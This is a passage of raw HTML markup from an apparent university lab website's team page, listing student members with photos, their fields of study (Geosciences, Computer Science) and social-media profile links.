v-inner-0 style-912 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-920 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-914 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-915 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-921 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c175-outer\">\n            <div data-colibri-id=\"182-c175\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c175 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c176\" class=\"d-block style-922 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c176-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c176-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-914 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-text h-text-component style-915 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"style-923 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c180-outer\">\n            <div data-colibri-id=\"182-c180\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c180 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c181\" class=\"d-block style-913 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c181-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c181-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c182\" class=\"h-global-transition-all h-heading style-914 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c182\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-text h-text-component style-915 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"style-917 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c185-outer\">\n            <div data-colibri-id=\"182-c185\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c185 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c186\" class=\"d-block style-913 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c186-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c186-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c187\" class=\"h-global-transition-all h-heading style-914 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c187\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-text h-text-component style-915 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"style-917 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c190-outer\">\n            <div data-colibri-id=\"182-c190\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c190 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c191\" class=\"d-block style-913 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c191-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c191-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c192\" class=\"h-global-transition-all h-heading style-914 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c192\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-text h-text-component style-915 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"style-917 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-913 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-914 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-915 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c199-outer\">\n            <div data-colibri-id=\"182-c199\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c199 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c200\" class=\"d-block style-913 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c200-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c200-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c201\" class=\"h-global-transition-all h-heading style-914 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c201\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-text h-text-component style-915 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"style-917 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c204-outer\">\n            <div data-colibri-id=\"182-c204\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c204 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c205\" class=\"d-block style-913 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c205-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c205-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"h-global-transition-all h-heading style-914 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c206\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-text h-text-component style-915 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"style-917 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 